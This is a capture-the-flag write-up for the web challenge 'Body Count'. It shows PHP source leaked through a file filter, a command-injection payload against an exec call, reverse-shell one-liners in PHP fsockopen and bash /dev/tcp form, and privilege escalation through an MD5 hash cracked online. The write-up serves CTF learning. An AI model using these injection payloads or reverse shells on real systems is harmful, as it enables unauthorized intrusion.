Tags: web
Rating: 4.0
# Body Count
## Challenge details
**Category** : Web
**points** : 493
**Description** : Here’s a character count service for you!
## Solution
First time in the website we see a black screen written but nothing intresting by observing the url `http://chall.csivit.com:30202/?file=wc.php` we can see that's it's the content
of the `wc.php` so i tried checking `robots.txt` and we got this :
Disallow: /?file=checkpass.php
In order to be able to see the content of `checkpass.php` we can use a php filter
Using that we got the base64 of the `checkpass.php` after decoding it we got this :
``` php
<html lang="en">
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>wc as a service</title>
body {
overflow: none;
max-height: 100vh;
<body style="height: 100vh; text-align: center; background-color: black; color: white; display: flex; flex-direction: column; justify-content: center;">
<h1>Character Count as a Service</h1>
<input type="hidden" value="wc.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="text" rows=30 cols=100></textarea>
<input type="submit">
The Character Count is: " . exec('printf \'' . $text . '\' | wc -c') . "</h2>";
By looking to the source code we can divide it into two parts
#### Part One
Our cookie password will get checked , in case of fail a message saying `Sorry, only people from csivit are allowed to access this page.` will appear and the rest
of the code won't be executed due to the die() focntion . So we tried the password that we got earlier `w0rdc0unt123` and it worked now we can see the rest of the
webpage and pass to the second part
#### Part Two
As we can see our input `Text`obtained by the GET form will be putten inside this command `printf '{text}' | wc -c`. We can easily bypass this and get a command execution
using this payload :
`'; command # `
* ` ' ` : To close the first quote and complete the printf command
* ` ; ` : In order to specify a second command
* `command` : This is the command tha we want to execute
* `#` : To comment out the rest
**Note** : We will only get the last line of the result due to the exec focntion that only returns the last line of the result a way to bypass it is by adding `| head -n $line` after the command where $line represents the line you want to read but we will not need to do this here
So after that I tried `'; ls #` and this was the result :
The Character Count is: wc.php
Bingo ! Our code injection worked now we will try to spawn a shell , at the begining i tried to do it with netcat and python but neither of those were present in the
server so i did it using php and this was the command :
php -r '$sock=fsockopen( "$your_adress_ip" , $port );exec("/bin/sh -i <&3 >&3 2>&3");'
The full command will be like this :
' ; php -r '$sock=fsockopen( "$your_adress_ip" , $port );exec("/bin/sh -i <&3 >&3 2>&3");' #
Another way to do it is using the bach technique :
bash -i >& /dev/tcp/$your_adress_ip/$port 0>&1
With that we were able to get a shell in the server and we were the user `www-data`
After navigating a little bit inside the server I found two intresting files :
* `flag.txt` : Which was located at `/ctf/system/of/a/down/` to find it you can use this `find / -iname "*flag*" ` .But we can't read it because of permissions, the only users who could read it are `root`
and `csictf`
* `README` : A file located at `/ctf` and this was its content :
My password hash is 6f246c872cbf0b7fd7530b7aa235e67e.
So this is propably the password of the `csictf` user, all we need to do is crack it than su to csictf and read the flag . I wasn't able to crack it using john but an online crackstation were able to crack it and this is the passsword `csictf` i think anyone
could guess it
Now we can change user to `csictf` using `su` and read the flag
#### The Flag